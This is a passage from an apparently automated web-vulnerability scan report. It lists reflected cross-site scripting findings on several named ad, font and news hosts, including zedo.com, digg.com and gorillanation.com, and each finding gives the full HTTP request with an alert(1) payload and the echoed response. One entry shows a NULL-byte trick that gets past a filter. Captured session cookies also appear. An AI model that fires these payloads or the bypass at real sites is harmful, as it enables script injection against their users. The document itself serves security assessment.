Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:77d71";alert(1)//149bbdc5fd3;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:47 GMT;path=/;domain=.zedo.com;
ETag: "e2185d-85e6-4a4a581422f00"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=65
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:47 GMT
Content-Length: 2437
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',77d71";alert(1)//149bbdc5fd3';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,77d71";alert(1)//149bbdc5fd3;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasAd=undefined;

...[SNIP]...

4.119. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-407/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6798e'%3balert(1)//ac9423e96e6 was submitted in the q parameter. This input was echoed as 6798e';alert(1)//ac9423e96e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-407/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=13&d=14&q=6798e'%3balert(1)//ac9423e96e6&$=&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:41 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "e2185d-85e6-4a4a581422f00"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=71
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:41 GMT
Content-Length: 2434
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='6798e';alert(1)//ac9423e96e6';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=6798e';alert(1)//ac9423e96e6;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasAd
...[SNIP]...

4.120. http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-407/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70159"%3balert(1)//d878d3d5c5 was submitted in the q parameter. This input was echoed as 70159";alert(1)//d878d3d5c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-407/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=13&d=14&q=70159"%3balert(1)//d878d3d5c5&$=&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:07:41 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "e2185d-85e6-4a4a581422f00"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=71
Expires: Mon, 13 Jun 2011 11:08:52 GMT
Date: Mon, 13 Jun 2011 11:07:41 GMT
Content-Length: 2432
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='70159";alert(1)//d878d3d5c5';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=70159";alert(1)//d878d3d5c5;z="+Math.random();}

if(zzuid=='unknown')zzuid='lYrOTcGt89Yz1ao6zwEmLiof~051411';

var zzhasAd=undefined;

...[SNIP]...

4.121. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/ [callback parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://daapiak.flux.com
Path:	/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload da811(a)88448242ef8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/?q=http%3A%2F%2Fmoviesblog.mtv.com%2F2011%2F06%2F12%2Fgame-of-thrones-spoiler-death-sean-bean%2F&callback=FFEAA0CC93007da811(a)88448242ef8 HTTP/1.1
Host: daapiak.flux.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Server: w08g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 6223
Cache-Control: max-age=600
Date: Mon, 13 Jun 2011 11:24:01 GMT
Connection: close

if (typeof(FFEAA0CC93007da811(a)88448242ef8) == 'function'){FFEAA0CC93007da811(a)88448242ef8({"Title":"'Game Of Thrones': About Tonight's Big Spoiler...","Ucid":"D3FCFFFF0002D51D001B01477BA2","Thumbnails":{"CustomTemplate":"http:\/\/filesll.flu
...[SNIP]...

4.122. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://daapiak.flux.com
Path:	/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1e121%3balert(1)//f8f1d10d0d7 was submitted in the callback parameter. This input was echoed as 1e121;alert(1)//f8f1d10d0d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/Feeds/Content/Usage?q=http%3A%2F%2Fmoviesblog.mtv.com%2F2011%2F06%2F12%2Fgame-of-thrones-spoiler-death-sean-bean%2F&callback=F65FF440430071e121%3balert(1)//f8f1d10d0d7 HTTP/1.1
Host: daapiak.flux.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Server: w10g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 507
Cache-Control: max-age=600
Date: Mon, 13 Jun 2011 11:24:06 GMT
Connection: close

if (typeof(F65FF440430071e121;alert(1)//f8f1d10d0d7) == 'function'){F65FF440430071e121;alert(1)//f8f1d10d0d7({"CommentCount":0,"CommentData":null,"GainRatingCount":0,"IsFirstPage":false,"IsInvisible":false,"IsLastPage":false,"OverallFiveStarRating":0,"
...[SNIP]...

4.123. http://daapiak.flux.com/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://daapiak.flux.com
Path:	/2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload aa1cc%3balert(1)//f751d8e6f88 was submitted in the callback parameter. This input was echoed as aa1cc;alert(1)//f751d8e6f88 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2.0/00001/Json/D3FCFFFF0002D51D0002FFFFFCD3/UI/ShareService/Services?earlyServicesOnly=false&callback=F3230BE7B3007aa1cc%3balert(1)//f751d8e6f88 HTTP/1.1
Host: daapiak.flux.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Server: w07g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 9655
Cache-Control: max-age=600
Date: Mon, 13 Jun 2011 11:23:59 GMT
Connection: close

if (typeof(F3230BE7B3007aa1cc;alert(1)//f751d8e6f88) == 'function'){F3230BE7B3007aa1cc;alert(1)//f751d8e6f88([{"__type":"ExternalShareServiceData","LargeThumbnailUrl":null,"Sections":"","ShareType":"flux","SystemName":"flux","ThumbnailUrl":"http:\/\/st
...[SNIP]...

4.124. http://digg.com/tools/diggthis.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/tools/diggthis.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005a7b2"><script>alert(1)</script>874123e3b2f was submitted in the REST URL parameter 1. This input was echoed as 5a7b2"><script>alert(1)</script>874123e3b2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /%005a7b2"><script>alert(1)</script>874123e3b2f/diggthis.js HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
Referer: http://www.gamershell.com/news_118846.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:23:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=8144478524238096536%3A211; expires=Tue, 14-Jun-2011 11:23:31 GMT; path=/; domain=digg.com
Set-Cookie: d=5634eb57baa7c24c984b568442a99c3c7b2efae6ecb9a20afd4dcf647acdc70f; expires=Sat, 12-Jun-2021 21:31:11 GMT; path=/; domain=.digg.com
X-Digg-Time: D=347865 10.2.128.186
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 17743

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/%005a7b2"><script>alert(1)</script>874123e3b2f/diggthis.js.rss">
...[SNIP]...

4.125. http://digg.com/tools/diggthis.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/tools/diggthis.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f62e6"><script>alert(1)</script>b012967b31b was submitted in the REST URL parameter 2. This input was echoed as f62e6"><script>alert(1)</script>b012967b31b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /tools/diggthis.js%00f62e6"><script>alert(1)</script>b012967b31b HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
Referer: http://www.gamershell.com/news_118846.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:23:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=8434960700203493528%3A211; expires=Tue, 14-Jun-2011 11:23:35 GMT; path=/; domain=digg.com
Set-Cookie: d=dd1a33bf76cd1a3a30c4c728bf3e1f3a045257e336ebe233d2fdbe5db31f50e8; expires=Sat, 12-Jun-2021 21:31:15 GMT; path=/; domain=.digg.com
X-Digg-Time: D=746448 10.2.130.111
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 15097

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/tools/diggthis.js%00f62e6"><script>alert(1)</script>b012967b31b.rss">
...[SNIP]...

4.126. http://event.adxpose.com/event.flow [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://event.adxpose.com
Path:	/event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 878e8<script>alert(1)</script>ae45a7426be was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&uid=KxwltwQfcXn0PkkN_1000014620118878e8<script>alert(1)</script>ae45a7426be&xy=44%2C2676&wh=1065%2C926&vchannel=Centro&cid=Zenith-Sonic&iad=1307962922145-25851937336847188&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=32&flash=10.3&iframed=0 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=6805757a-ba62-4ca3-815c-dec40d38f03a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=545B7F561D3473D82A16C9A7FB3C8C63; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 152
Date: Mon, 13 Jun 2011 11:02:10 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("KxwltwQfcXn0PkkN_1000014620118878e8<script>alert(1)</script>ae45a7426be");

4.127. http://fonts.gawker.com/k/zvc4iwz-e.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fonts.gawker.com
Path:	/k/zvc4iwz-e.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9b845<script>alert(1)</script>d344801ae69 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k9b845<script>alert(1)</script>d344801ae69/zvc4iwz-e.css?3bb2a6e53c9684ffdc9a98f3125b2a626c095928039adb8cca8e16c915a159b0f3c8d256a5ec264208bbf5cbd1783600e65386356fa35d50982087f520acbb9763065409424973295f46d8d9db605d324f45829106861751ccba125a79487b746ad1ec2508547ea754a6edb66e38116953b75739dfe7f6f95a3018b5ce990280ee1d258bc715dd5bbcf830e9831cdd9209903a493236912cbfcda237a49fcd46a4cd122c6d741bbd7614db135bb3b420f1e3ebf246bcad7673a1494255af32690eff20cde61fbdaf8132c6201d88ad4a6e2d879073b84c58b4ba30a25390f9b8d872313c611595ee7d571ff19bba591cf054af39838148f48644b1c65b49804518c7 HTTP/1.1
Host: fonts.gawker.com
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: form_token=76a913a1dd4b346f61ad2a370c8c38ac; __qca=P0-500669253-1305981292998; __utmz=76883914.1305981293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=76883914.1133493516.1305981293.1305981293.1305981293.1; ____GSV=dynamic

Response

HTTP/1.1 404 Not Found
Content-Type: text/plain
Date: Mon, 13 Jun 2011 11:23:25 GMT
Server: nginx/0.8.36
X-Runtime: 0.001039
Content-Length: 68

Not Found: /k9b845<script>alert(1)</script>d344801ae69/zvc4iwz-e.css

4.128. http://fonts.gawker.com/k/zvc4iwz-e.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fonts.gawker.com
Path:	/k/zvc4iwz-e.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9ef81<script>alert(1)</script>595f97f776b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/zvc4iwz-e.css9ef81<script>alert(1)</script>595f97f776b?3bb2a6e53c9684ffdc9a98f3125b2a626c095928039adb8cca8e16c915a159b0f3c8d256a5ec264208bbf5cbd1783600e65386356fa35d50982087f520acbb9763065409424973295f46d8d9db605d324f45829106861751ccba125a79487b746ad1ec2508547ea754a6edb66e38116953b75739dfe7f6f95a3018b5ce990280ee1d258bc715dd5bbcf830e9831cdd9209903a493236912cbfcda237a49fcd46a4cd122c6d741bbd7614db135bb3b420f1e3ebf246bcad7673a1494255af32690eff20cde61fbdaf8132c6201d88ad4a6e2d879073b84c58b4ba30a25390f9b8d872313c611595ee7d571ff19bba591cf054af39838148f48644b1c65b49804518c7 HTTP/1.1
Host: fonts.gawker.com
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: form_token=76a913a1dd4b346f61ad2a370c8c38ac; __qca=P0-500669253-1305981292998; __utmz=76883914.1305981293.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=76883914.1133493516.1305981293.1305981293.1305981293.1; ____GSV=dynamic

Response

HTTP/1.1 404 Not Found
Content-Type: text/plain
Date: Mon, 13 Jun 2011 11:23:28 GMT
Server: nginx/0.8.36
X-Runtime: 0.000900
Content-Length: 68

Not Found: /k/zvc4iwz-e.css9ef81<script>alert(1)</script>595f97f776b

4.129. http://geo.gorillanation.com/geo.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://geo.gorillanation.com
Path:	/geo.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23a25'%3balert(1)//994d27fcf7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 23a25';alert(1)//994d27fcf7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /geo.php?dynamic=0&website_id=/23a25'%3balert(1)//994d27fcf7f4600 HTTP/1.1
Host: geo.gorillanation.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 13 Jun 2011 11:22:42 GMT
Server: Apache/2.2.8 (EL)
X-Powered-By: PHP/5.1.6
Expires: Sat, 3 Sep 1977 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 11:22:42 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
X-Served-By: app2v.lax1
Content-Length: 319
Content-Type: application/json; charset="utf-8"
X-Cache: MISS from pxy1v.lax1
X-Cache-Lookup: MISS from pxy1v.lax1:80
Via: 1.0 pxy1v.lax1:80 (squid/2.6.STABLE6)
Connection: close

gn_country='US';ip='173.193.214.243';exdate=new Date();exdate.setDate(exdate.getDate()+ 7);document.cookie="gn_country=US; expires=" + exdate.toGMTString() + "; path=/";document.write('<script src="http://cdn.triggertag.gorillanation.com/js//23a25';alert(1)//994d27fcf7f4600_US.php" type="text/javascript">
...[SNIP]...

4.130. http://geo.gorillanation.com/geo.php [website_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://geo.gorillanation.com
Path:	/geo.php

Issue detail

The value of the website_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95b6c'%3balert(1)//6c8ffe311ff was submitted in the website_id parameter. This input was echoed as 95b6c';alert(1)//6c8ffe311ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /geo.php?dynamic=0&website_id=460095b6c'%3balert(1)//6c8ffe311ff HTTP/1.1
Host: geo.gorillanation.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/2011/06/game-of-thrones-review-baelor/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 13 Jun 2011 11:22:41 GMT
Server: Apache/2.2.8 (EL)
X-Powered-By: PHP/5.1.6
Expires: Sat, 3 Sep 1977 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 11:22:41 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
X-Served-By: app1v.lax1
Content-Length: 318
Content-Type: application/json; charset="utf-8"
X-Cache: MISS from pxy1v.lax1
X-Cache-Lookup: MISS from pxy1v.lax1:80
Via: 1.0 pxy1v.lax1:80 (squid/2.6.STABLE6)
Connection: close

gn_country='US';ip='173.193.214.243';exdate=new Date();exdate.setDate(exdate.getDate()+ 7);document.cookie="gn_country=US; expires=" + exdate.toGMTString() + "; path=/";document.write('<script src="http://cdn.triggertag.gorillanation.com/js/460095b6c';alert(1)//6c8ffe311ff_US.php" type="text/javascript">
...[SNIP]...

